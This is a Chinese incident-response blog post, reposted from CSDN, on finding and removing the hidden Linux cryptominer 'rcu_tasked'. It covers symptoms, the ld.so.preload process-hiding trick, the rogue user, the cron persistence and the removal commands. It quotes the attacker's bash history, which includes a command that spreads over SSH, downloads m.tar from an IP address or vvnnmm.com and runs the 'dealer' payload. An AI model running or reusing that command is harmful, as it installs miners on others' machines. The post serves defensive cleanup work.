【安全】查杀linux隐藏挖矿病毒rcu_tasked

艺帆风顺 发布于 2025-04-02 28 次阅读

这是黑客使用的批量蔓延病毒的工具,通过如下脚本

    [root@Server .cfg]# cat /home/pischi/.bash_historycd /root/nvidia-smi;ls -a;cd .cfg;ls -a;wc -l ip./key 20 -f ip pass 22 "nproc;nvidia-smi;rm -rf .cfg;mkdir .cfg;cd .cfg; wget 193.42.32.96/m.tar || curl -O vvnnmm.com/m.tar ; tar xvf m.tar || tar xvf m.tar.1 ; rm -rf m.tar*;chmod +x *;./dealer"

      /root/.cfg/目录下的病毒源文件目前未查清楚原文件是通过隐藏在什么程序中带过来的,这是一大遗憾

      中毒现象

      中毒现象提现未cpu占用100%,且通过top、netstat、ps等命令找不到进程号挖矿的矿池IP,全是国外的IP,大概看了一下,基本是德国、芬兰、印度、美国等地区的

      另外存在未知跟root权限一样高的用户“pischi”

      解决方案

      主要策略就是找到病毒,然后删除,如下是相关的命令

      # 病毒清除rcu_tasked,伪装挖矿程序清除# 病毒通过这个文件实现隐藏进程ID,将里面的内容/usr/local/lib/libextrasshd.so删除即可rm-f /etc/ld.so.preload rm-f /usr/local/lib/libextrasshd.sorm-rf /root/.cfg/rm-rf /usr/bin/mslog/rm-f /usr/bin/player找到rcu_tasked病毒进程netstat-antpps-ef|grep rcu_taskedkill-9 xxxsystemctl disable myservicerm-f /lib/systemd/system/myservice.service删除 pischi 用户vipw删除 pischi shadowvipw -s删除pischi用户目录rm-rf /home/pischi/删除定时任务crontab-e删除此行@monthly /root/.cfg/./dealer  > /dev/null 2>&1& disown重启操作系统reboot

        复盘原因

        前期项目比较着急,统一使用了一个跳板机,多人使用且均用了root用户,权限管控不到位,所有机器密码都一样,这期间可能密码泄露导致了此问题。

        参考文档系统杀毒复盘隐藏挖矿木马rcu_tasked的查杀【安全】查杀linux上c3pool挖矿病毒xmrig【安全】查杀linux挖矿病毒 kswapd0【安全】查杀linux隐藏挖矿病毒rcu_tasked【安全】挖矿木马自助清理手册

          版权声明:本文内容来自CSDN:chenzfp,遵循CC 4.0 BY-SA版权协议上原文接及本声明。本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行可。原文链接:https://blog.csdn.net/UberSoldier/article/details/134039899如有涉及到侵权,请联系,将立即予以删除处理。在此特别鸣谢原作者的创作。此篇文章的所有版权归原作者所有,与本公众号无关,商业转载建议请联系原作者,非商业转载请注明出处。